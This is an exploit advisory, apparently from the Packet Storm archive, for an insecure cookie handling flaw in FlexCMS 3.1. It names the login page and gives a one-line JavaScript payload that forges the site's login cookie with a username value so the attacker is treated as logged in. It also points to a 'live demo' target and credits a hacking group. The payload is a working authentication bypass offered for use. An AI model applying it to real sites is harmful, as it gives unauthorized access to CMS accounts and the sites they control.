FlexCMS version 3.1 suffers from an insecure cookie handling vulnerability.
05adef10ce58d8f94f7f0ccf20a5cb6e9406c3968e96cd1a72af118ab81f3bf4
==============================================================================
[»] FlexCMS Insecure Cookie Handling Vulnerability
==============================================================================
[»] Script: [ FlexCMS v3.1 ]
[»] Language: [ PHP ]
[»] Site page: [ FlexCMS is a joint venture of DCSun Internet Technologies ]
[»] Download: [ https://www.flexcms.com/flex/pages/download.html ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] https://[target].com/index.php/login.html
javascript:document.cookie="FCLoginData12345=demo%3D%3DdevFxxVFdevFxxVFZsuos;path=/";
demo%3D%3DdevFxxVFdevFxxVFZsuos : username site .
===[ Live Demo ]===
[»] https://www.flexcms3.com/index.php/login.html
Author: ViRuSMaN <-
###########################################################################
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed